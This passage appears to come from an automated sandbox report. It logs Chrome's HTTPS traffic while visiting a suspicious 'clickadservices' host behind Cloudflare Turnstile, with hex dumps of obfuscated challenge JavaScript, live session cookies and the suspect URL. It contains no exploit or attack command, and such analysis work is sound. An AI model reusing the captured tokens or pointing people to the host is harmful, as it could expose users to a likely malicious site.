                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:35 UTC358INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:35 GMT
                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b3a0b97c3e6-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:35 UTC1011INData Raw: 37 39 30 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 78 2c 66 45 2c 66 46 2c 66 47 2c 66 4d 2c 66 4e 2c 67 64 2c 67 65 2c 67 66 2c 67 6a 2c 67 6b 2c 67 72 2c 67 79 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c 68 67 2c 68 68 2c 68 69 2c 68 6a 2c 68 6b 2c 68 6c 2c 68 6d 2c 68 6e 2c 68 6f 2c 68 70 2c 68 71 2c 68 72 2c 68 73 2c 68 74 2c 68 75 2c 68
                                                                                                                                      Data Ascii: 790window._cf_chl_opt.uaO=false;~function(ix,fE,fF,fG,fM,fN,gd,ge,gf,gj,gk,gr,gy,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,hg,hh,hi,hj,hk,hl,hm,hn,ho,hp,hq,hr,hs,ht,hu,h
                                                                                                                                      2024-05-08 18:12:35 UTC932INData Raw: 7c 69 7d 2c 27 76 54 4b 4d 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 5a 64 4d 56 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4b 4b 47 42 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 78 78 51 59 52 27 3a 69 79 28 32 33 35 38 29 2c 27 49 44 42 53 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 41 50 52 4d 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 53 4c 64 46 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 63 58 52 61 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74
                                                                                                                                      Data Ascii: |i},'vTKMO':function(h,i){return i|h},'ZdMVD':function(h,i){return h(i)},'KKGBw':function(h,i){return i!==h},'xxQYR':iy(2358),'IDBSv':function(h,i){return i==h},'APRMa':function(h,i){return h(i)},'SLdFf':function(h,i){return h<i},'cXRao':function(h,i){ret
                                                                                                                                      2024-05-08 18:12:35 UTC1369INData Raw: 31 37 34 30 0d 0a 56 64 57 52 51 27 3a 69 41 28 35 30 35 29 2c 27 45 59 68 76 6e 27 3a 69 41 28 31 33 37 39 29 2c 27 52 43 6c 59 46 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 5e 4f 7d 2c 27 61 4c 77 70 70 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 42 29 7b 72 65 74 75 72 6e 20 69 42 3d 69 41 2c 64 5b 69 42 28 31 36 39 39 29 5d 28 4f 2c 50 29 7d 2c 27 68 6e 47 61 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 2d 50 7d 2c 27 54 66 73 58 73 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 5e 4f 7d 2c 27 78 55 6b 5a 48 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 43 29 7b 72 65 74 75 72 6e 20 69 43 3d 69 41 2c 64 5b 69 43 28 31 39 33 36 29 5d 28 4f 2c 50 29 7d 7d 2c 6e 75
                                                                                                                                      Data Ascii: 1740VdWRQ':iA(505),'EYhvn':iA(1379),'RClYF':function(O,P){return P^O},'aLwpp':function(O,P,iB){return iB=iA,d[iB(1699)](O,P)},'hnGaO':function(O,P){return O-P},'TfsXs':function(O,P){return P^O},'xUkZH':function(O,P,iC){return iC=iA,d[iC(1936)](O,P)}},nu
                                                                                                                                      2024-05-08 18:12:35 UTC1369INData Raw: 5b 31 5d 5b 69 41 28 32 33 38 33 29 5d 28 73 2e 68 5b 73 5b 69 41 28 37 34 37 29 5d 28 31 37 32 2c 65 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 34 35 29 2c 32 35 36 29 26 32 35 35 2c 78 7c 3d 73 5b 69 41 28 36 39 35 29 5d 28 51 2c 31 32 37 29 3c 3c 42 2c 43 2b 3d 37 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 69 41 28 31 33 36 33 29 5d 28 78 2c 47 29 3b 49 3d 64 5b 69 41 28 31 30 34 39 29 5d 28 49 3c 3c 31 2e 35 38 2c 31 26 4e 29 2c 4a 3d 3d 64 5b 69 41 28 32 34 30 33 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 69 41 28 33 31 37 34 29 5d 28 64 5b 69 41 28 32 33 32 36 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 44 3d 28 45 2d 2d 2c 64 5b 69 41 28 32 38 31 34 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d
                                                                                                                                      Data Ascii: [1][iA(2383)](s.h[s[iA(747)](172,e.g)][0]++),45),256)&255,x|=s[iA(695)](Q,127)<<B,C+=7}else for(N=B[D],x=0;d[iA(1363)](x,G);I=d[iA(1049)](I<<1.58,1&N),J==d[iA(2403)](j,1)?(J=0,H[iA(3174)](d[iA(2326)](o,I)),I=0):J++,N>>=1,x++);D=(E--,d[iA(2814)](0,E)&&(E=M
                                                                                                                                      2024-05-08 18:12:35 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 69 2c 69 46 29 7b 72 65 74 75 72 6e 20 69 46 3d 69 45 2c 68 5b 69 46 28 32 33 38 33 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 47 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 69 66 28 69 47 3d 69 79 2c 69 47 28 32 35 38 30 29 3d 3d 3d 69 47 28 32 35 34 30 29 29 47 5b 69 47 28 32 36 35 32 29 5d 28 6a 29 28 43 2e 69 29 3b 65 6c 73 65 7b 66 6f 72 28 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 64 5b 69 47 28 31 34 35 37 29 5d 28 33 2c 45 29 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 47 28 31 32 39 35 29 5d 28 32
                                                                                                                                      Data Ascii: unction(i,iF){return iF=iE,h[iF(2383)](i)})},'i':function(i,j,o,iG,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){if(iG=iy,iG(2580)===iG(2540))G[iG(2652)](j)(C.i);else{for(s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;d[iG(1457)](3,E);s[E]=E,E+=1);for(J=0,K=Math[iG(1295)](2
                                                                                                                                      2024-05-08 18:12:35 UTC1369INData Raw: 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 69 47 28 31 36 36 39 29 5d 28 27 27 29 7d 69 66 28 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 69 47 28 31 32 39 35 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4f 5d 29 4f 3d 73 5b 4f 5d 3b 65 6c 73 65 20 69 66 28 42 3d 3d 3d 4f 29 4f 3d 64 5b 69 47 28 31 36 39 39 29 5d 28 45 2c 45 5b 69 47 28 33 31 34 39 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 69 47 28 33 31 37 34 29 5d 28 4f 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4f 5b 69 47 28 33 31 34 39 29 5d 28 30 29 2c 78 2d 2d 2c 45 3d 4f 2c 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 69 47 28 31 32 39 35 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 69 79 28 31 37 31
                                                                                                                                      Data Ascii: =B-1,x--;break;case 2:return D[iG(1669)]('')}if(0==x&&(x=Math[iG(1295)](2,C),C++),s[O])O=s[O];else if(B===O)O=d[iG(1699)](E,E[iG(3149)](0));else return null;D[iG(3174)](O),s[B++]=E+O[iG(3149)](0),x--,E=O,x==0&&(x=Math[iG(1295)](2,C),C++)}}}},g={},g[iy(171
                                                                                                                                      2024-05-08 18:12:35 UTC484INData Raw: 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 76 53 70 7a 70 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 52 59 67 6c 73 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 7d 2c 6e 75 6c 6c 3d 3d 3d 68 7c 7c 6f 5b 6a 73 28 31 39 33 31 29 5d 28 76 6f 69 64 20 30 2c 68 29 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 6f 5b 6a 73 28 31 37 32 33 29 5d 28 67 69 2c 68 29 2c 67 5b 6a 73 28 32 31 39 33 29 5d 5b 6a 73 28 31 33 39 31 29 5d 26 26 28 78 3d 78 5b 6a 73 28 37 39 31 29 5d 28 67 5b 6a 73 28 32 31 39 33 29 5d 5b 6a 73 28 31 33 39 31 29 5d 28 68 29 29 29 2c 78 3d 67 5b 6a 73 28 31 36 31 31 29 5d 5b 6a 73 28 32 30 33 39 29 5d 26 26 67 5b 6a 73 28 33 31 33 30 29 5d 3f 67 5b 6a
                                                                                                                                      Data Ascii: return G+H},'vSpzp':function(G,H,I){return G(H,I)},'RYgls':function(G,H){return G+H}},null===h||o[js(1931)](void 0,h))return j;for(x=o[js(1723)](gi,h),g[js(2193)][js(1391)]&&(x=x[js(791)](g[js(2193)][js(1391)](h))),x=g[js(1611)][js(2039)]&&g[js(3130)]?g[j
                                                                                                                                      2024-05-08 18:12:35 UTC1369INData Raw: 62 66 62 0d 0a 37 37 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 6a 73 28 31 38 37 33 29 5d 28 67 68 2c 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 6a 73 28 31 33 39 35 29 5d 28 68 5b 44 5d 29 2c 6f 5b 6a 73 28 31 38 36 36 29 5d 28 6a 73 28 39 34 34 29 2c 69 2b 44 29 3f 6f 5b 6a 73 28 37 36 30 29 5d 28 73 2c 6f 5b 6a 73 28 33 32 37 35 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 73 28 6f 5b 6a 73 28 31 37 35 36 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 6f 5b 6a 73 28 31 33 31 39 29 5d 28 73 2c 6f 5b 6a 73 28 35 37 34 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 6a 72 29 7b 6a 72 3d 62 2c 4f 62 6a 65 63 74 5b 6a 72 28 32 31 33 37 29 5d 5b 6a 72 28
                                                                                                                                      Data Ascii: bfb77)];D=x[C],E=o[js(1873)](gh,g,h,D),B(E)?(F=E==='s'&&!g[js(1395)](h[D]),o[js(1866)](js(944),i+D)?o[js(760)](s,o[js(3275)](i,D),E):F||s(o[js(1756)](i,D),h[D])):o[js(1319)](s,o[js(574)](i,D),E),C++);return j;function s(G,H,jr){jr=b,Object[jr(2137)][jr(
                                                                                                                                      2024-05-08 18:12:35 UTC1369INData Raw: 73 2e 68 5b 6b 5b 6a 76 28 35 37 38 29 5d 28 78 2c 74 68 69 73 2e 67 29 5d 3b 65 6c 73 65 20 69 66 28 6b 5b 6a 76 28 36 36 34 29 5d 28 32 30 39 2c 78 29 29 78 3d 6b 5b 6a 76 28 32 32 37 39 29 5d 28 74 68 69 73 2e 68 5b 6b 5b 6a 76 28 35 37 38 29 5d 28 31 37 32 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 6b 5b 6a 76 28 35 36 36 29 5d 28 6b 5b 6a 76 28 31 32 39 32 29 5d 28 74 68 69 73 2e 68 5b 31 37 32 2e 38 38 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 6a 76 28 32 33 38 33 29 5d 28 74 68 69 73 2e 68 5b 31 37 32 2e 31 34 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 34 35 29 2b 32 35 36 2c 32 35 35 29 2c 33 39 29 2c 74 68 69 73 2e 68 5b 78 5e 74 68 69 73 2e 67 5d 3d 43 5b 42 5d 2e 6c 3b 65 6c 73 65 20 69 66 28 6b 5b 6a 76 28 31 32 37 35 29 5d 28 33 36 2c 78 29 29 7b 66
                                                                                                                                      Data Ascii: s.h[k[jv(578)](x,this.g)];else if(k[jv(664)](209,x))x=k[jv(2279)](this.h[k[jv(578)](172,this.g)][3]^k[jv(566)](k[jv(1292)](this.h[172.88^this.g][1][jv(2383)](this.h[172.14^this.g][0]++),45)+256,255),39),this.h[x^this.g]=C[B].l;else if(k[jv(1275)](36,x)){f
                                                                                                                                      2024-05-08 18:12:35 UTC336INData Raw: 6a 5b 6b 63 28 36 32 30 29 5d 28 6a 5b 6b 63 28 31 30 34 38 29 5d 28 6a 5b 6b 63 28 31 30 34 38 29 5d 28 6a 5b 6b 63 28 31 34 37 30 29 5d 28 6b 63 28 33 31 36 31 29 2c 6c 29 2c 6a 5b 6b 63 28 32 32 30 32 29 5d 29 2c 31 29 2c 6a 5b 6b 63 28 32 37 37 37 29 5d 29 2c 66 45 5b 6b 63 28 33 32 33 32 29 5d 5b 6b 63 28 32 36 38 32 29 5d 29 2c 27 2f 27 29 2c 66 45 5b 6b 63 28 33 32 33 32 29 5d 5b 6b 63 28 33 30 38 38 29 5d 29 2c 27 2f 27 29 2b 66 45 5b 6b 63 28 33 32 33 32 29 5d 5b 6b 63 28 32 31 38 30 29 5d 2c 6e 3d 6e 65 77 20 66 45 5b 28 6b 63 28 34 38 35 29 29 5d 28 29 2c 21 6e 29 72 65 74 75 72 6e 3b 6f 3d 6b 63 28 32 33 39 39 29 2c 6e 5b 6b 63 28 31 39 31 37 29 5d 28 6f 2c 6d 2c 21 21 5b 5d 29 2c 6e 5b 6b 63 28 31 37 32 35 29 5d 3d 32 35 30 30 2c 6e 5b 6b 63
                                                                                                                                      Data Ascii: j[kc(620)](j[kc(1048)](j[kc(1048)](j[kc(1470)](kc(3161),l),j[kc(2202)]),1),j[kc(2777)]),fE[kc(3232)][kc(2682)]),'/'),fE[kc(3232)][kc(3088)]),'/')+fE[kc(3232)][kc(2180)],n=new fE[(kc(485))](),!n)return;o=kc(2399),n[kc(1917)](o,m,!![]),n[kc(1725)]=2500,n[kc


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.1649731104.17.3.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:35 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:35 UTC240INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:35 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 61
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: max-age=2629800, public
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b3aea547612-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:35 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.1649723104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:36 UTC1379OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6Ik0zZXU5YmFkS3YzdkxkSGY0RGcwM3c9PSIsInZhbHVlIjoiTDB2RzJ4UHRKWVdKKy9uOE9rRXBuOWZmbFhIaFIvNmRSYmpVbldlcEF4a3ZPOEg0YUFsQlVMQkd4NG1BOTNpZEsvcW5CRjBKQzlic0dTTEFtRVZZdmdrVk40QjUxYTBxRnhWVE84VnQ4eEVxOGJmY3VyZEI0MzdodnRROER4SFoiLCJtYWMiOiIzNDMyZTg1MmY0Y2Y2ZTk1NDk5NTJjYTBjMWJjOTJiYTc2YWNmYTE2ODI4OWVhOGIyNWMxZGM2ODgwMTU0NTIwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJXMWNmampPQU9BeDNWQjR6RzY4bmc9PSIsInZhbHVlIjoiVk5EN2QralJTbW9rVGNqMnpJdUNJSCtPaTA4Zm5LMUtVaTYwV0NXclAzL2xnVU10cERzU0ZHRk1maXp6MVl2cE5wNGp3bjFFa3lHeTZhZG5SdWs2V0lySzR5NkhmU3NMa29XMGs0WmVLUjZTbmRiYWY3NGNDZEN3NW41dElkTXYiLCJtYWMiOiIxZjg2MGMzN2ZhZDUxYTZlYWVlMWRiM2RjNTQxM2QxNGU3OWQ4NjVjNTdmMmUwMWM0Yjk5ZjdjMTZmNTE3NmQwIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:36 UTC648INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 08 May 2024 18:12:36 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzQrYwphdkQ9cRlxtCzeadwr8bJsrSW5JVzzaf%2Fj2CvBEQvx%2BPRky%2FVJ42nvfO54nnICGL9l21TisUaXQLbX%2Bv7EK%2FAnmEFTxrJcF2Cm4kSNFS%2FH5hHbHpaXQBDfvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Age: 11301
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b3ebdc5eb3b-SEA
                                                                                                                                      2024-05-08 18:12:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.1649732104.17.2.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:36 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:36 UTC240INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:36 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 61
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: max-age=2629800, public
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b4068bec387-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:36 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.1649733104.17.3.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:36 UTC915OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Length: 2744
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      CF-Challenge: 84d6ba6304ae385
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:36 UTC2744OUTData Raw: 76 5f 38 38 30 62 36 62 33 35 36 61 32 38 32 37 36 36 3d 6f 24 46 4b 4f 34 4e 71 6d 71 69 4c 46 6d 24 64 67 6a 4d 35 4d 37 4d 62 4b 64 74 4d 24 65 73 6a 69 37 65 4d 67 36 65 4b 59 43 69 31 4d 31 74 4e 77 77 24 77 58 69 35 4d 69 4b 65 41 72 66 64 4d 44 6e 4d 6d 59 33 4d 45 74 69 45 2d 63 4d 67 5a 45 72 4d 6d 41 59 69 4d 59 4a 31 73 66 71 35 4b 67 43 4d 43 4b 65 76 4d 4a 4c 48 43 36 4c 4d 5a 74 69 34 4d 6f 74 6d 66 6a 36 63 54 46 4d 61 49 4d 6d 4c 4d 6a 4f 25 32 62 64 4d 34 4d 6b 64 69 67 38 4a 6d 4b 24 6f 58 4d 4e 4f 39 72 43 2d 46 70 6e 4d 69 41 45 4b 69 72 47 4e 39 2b 4b 4d 43 68 4d 4e 73 55 43 6a 47 64 4d 6d 38 2b 47 69 6a 4d 6d 64 4d 77 38 34 64 4d 65 47 59 57 6f 66 39 53 65 64 69 6f 4d 6b 43 4d 4e 61 6a 4d 57 35 37 35 4e 46 53 4d 4e 35 73 2b 47 33 39
                                                                                                                                      Data Ascii: v_880b6b356a282766=o$FKO4NqmqiLFm$dgjM5M7MbKdtM$esji7eMg6eKYCi1M1tNww$wXi5MiKeArfdMDnMmY3MEtiE-cMgZErMmAYiMYJ1sfq5KgCMCKevMJLHC6LMZti4Motmfj6cTFMaIMmLMjO%2bdM4Mkdig8JmK$oXMNO9rC-FpnMiAEKirGN9+KMChMNsUCjGdMm8+GijMmdMw84dMeGYWof9SedioMkCMNajMW575NFSMN5s+G39
                                                                                                                                      2024-05-08 18:12:36 UTC734INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:36 GMT
                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
